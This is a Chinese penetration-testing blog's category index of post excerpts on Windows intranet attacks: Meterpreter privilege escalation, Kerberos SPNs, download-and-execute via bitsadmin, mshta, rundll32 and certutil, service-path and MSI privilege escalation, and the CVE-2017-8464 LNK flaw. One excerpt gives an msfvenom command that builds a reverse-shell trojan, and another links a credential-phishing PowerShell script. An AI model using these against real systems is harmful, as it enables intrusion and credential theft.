随笔分类 -  内网渗透

内网渗透
摘要:0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe 阅读全文
posted @ 2018-08-16 03:03 渗透测试中心 阅读(32592) 评论(1) 推荐(2) 编辑
摘要:0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链 阅读全文
posted @ 2018-08-16 02:56 渗透测试中心 阅读(142241) 评论(7) 推荐(10) 编辑
摘要:信息收集 网上各种前期信息收集的文章各种net view之类的这里就不贴了。 一般想知道哪一台是域控知道自己内网的DNS就可以了,一般域控安装都有安装DNS有些不止一台,其次是通过扫描获取开放端口为389机器或者使用NLTEST命令查看。最后就是各种net view查看域控是哪台主机 这里利用Pow 阅读全文
posted @ 2018-05-08 14:42 渗透测试中心 阅读(5329) 评论(0) 推荐(0) 编辑
摘要:Windows PowerShell的强大,并且内置,在渗透过程中,也让渗透变得更加有趣。而安全软件的对抗查杀也逐渐开始针对powershell的一切行为。在https://technet.microsoft.com,看到文档如下: Windows PowerShell是以.NET Framewor 阅读全文
posted @ 2018-05-03 18:12 渗透测试中心 阅读(1616) 评论(0) 推荐(0) 编辑
摘要:0x01 SPN定义 服务主体名称(SPN)是Kerberos客户端用于唯一标识给特定Kerberos目标计算机的服务实例名称。Kerberos身份验证使用SPN将服务实例与服务登录帐户相关联。如果在整个林中的计算机上安装多个服务实例,则每个实例都必须具有自己的SPN。如果客户端可能使用多个名称进行 阅读全文
posted @ 2017-12-21 21:47 渗透测试中心 阅读(16524) 评论(0) 推荐(0) 编辑
摘要:1.bitsadmin命令(只能命令下载到指定路径上,win7以上): 2.powershell命名下载执行:(win7以上) 3.mshta命令下载执行 payload.hta 4.rundll32命令下载执行 参考:https://github.com/3gstudent/Javascript- 阅读全文
posted @ 2017-11-28 11:06 渗透测试中心 阅读(6570) 评论(0) 推荐(0) 编辑
摘要:0x01 为什么要理解windows 安全认证机制: 加深对后续各种漏洞利用的理解深度,还是那句话,要知其然,更要知其所以然,不废话,咱们直接开始 0x02 windows认证协议主要有以下两种: 基于ntlm的认证方式,主要用在早期的windows工作组环境中,认证的过程也相对比较简单 另一种是基 阅读全文
posted @ 2017-11-18 10:48 渗透测试中心 阅读(2645) 评论(0) 推荐(0) 编辑
摘要:一、dll的定义 DLL(Dynamic Link Library)文件为动态链接库文件,又称“应用程序拓展”,是软件文件类型。在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中。当我们执行某一个程序时,相应的DLL文件就会被 阅读全文
posted @ 2017-09-04 01:55 渗透测试中心 阅读(5395) 评论(0) 推荐(1) 编辑
摘要:0x01 ipc$的定义 IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机 阅读全文
posted @ 2017-08-20 21:45 渗透测试中心 阅读(5349) 评论(0) 推荐(0) 编辑
摘要:1.powershell网络钓鱼脚本: https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1 2.MSF下生产一个后门文件,通过上传或者其他方式让其受害者点击 Msfv 阅读全文
posted @ 2017-08-11 13:22 渗透测试中心 阅读(715) 评论(0) 推荐(0) 编辑
摘要:Windows environments provide a group policy setting which allows a regular user to install a Microsoft Windows Installer Package (MSI) with system pri 阅读全文
posted @ 2017-08-09 18:01 渗透测试中心 阅读(638) 评论(0) 推荐(0) 编辑
摘要:In Windows environments when a service is registered with the system a new key is created in the registry which contains the binary path. Even though 阅读全文
posted @ 2017-08-09 17:54 渗透测试中心 阅读(467) 评论(0) 推荐(0) 编辑
摘要:Windows by default are vulnerable to several vulnerabilities that could allow an attacker to execute malicious code in order to abuse a system. From t 阅读全文
posted @ 2017-08-09 17:40 渗透测试中心 阅读(1269) 评论(0) 推荐(0) 编辑
摘要:certutil在渗透测测试中的使用技巧 0x01 前言 最近在Casey Smith‏ @subTee的twitter上学到了关于certutil的一些利用技巧。本文将结合自己的一些经验,介绍certutil在渗透测试中的应用,对cmd下downloader的实现方法作补充。 0x02 certu 阅读全文
posted @ 2017-08-09 14:47 渗透测试中心 阅读(12414) 评论(0) 推荐(0) 编辑
摘要:0x00 工具介绍 前言 BeRoot是一个后期开发工具,用于检查常见的Windows的配置错误,以方便找到提高我们提权的方法。其二进制编译地址为: https://github.com/AlessandroZ/BeRoot/releases 它将作为后开发模块被添加到pupy(Pupy是一个开源, 阅读全文
posted @ 2017-08-09 14:36 渗透测试中心 阅读(2337) 评论(0) 推荐(0) 编辑
摘要:没事儿看了一下subtee和enigma0x3今年在BSides Nashville 2017上的演讲,觉得这两个猥琐男简直不能再猥琐了 :-)其中有一个猥琐小技巧,又可以让我们好好hunting一番了。我这里先简单介绍一下吧: 在很多时候我们发现我们在目标机器环境里想要运行个js或者vbs脚本很困 阅读全文
posted @ 2017-08-09 14:29 渗透测试中心 阅读(1030) 评论(0) 推荐(1) 编辑
该文被密码保护。
posted @ 2017-06-28 23:53 渗透测试中心 阅读(42) 评论(0) 推荐(0) 编辑
摘要:前言 2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二 阅读全文
posted @ 2017-06-16 09:36 渗透测试中心 阅读(14031) 评论(0) 推荐(1) 编辑
摘要:Nmap Full Web Vulnerable Scan cd /usr/share/nmap/scripts/ wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf 阅读全文
posted @ 2017-06-01 11:14 渗透测试中心 阅读(1425) 评论(0) 推荐(0) 编辑
摘要:Not many people talk about serious Windows privilege escalation which is a shame. I think the reasons for this are probably (1) during pentesting enga 阅读全文
posted @ 2017-05-27 17:15 渗透测试中心 阅读(1784) 评论(0) 推荐(0) 编辑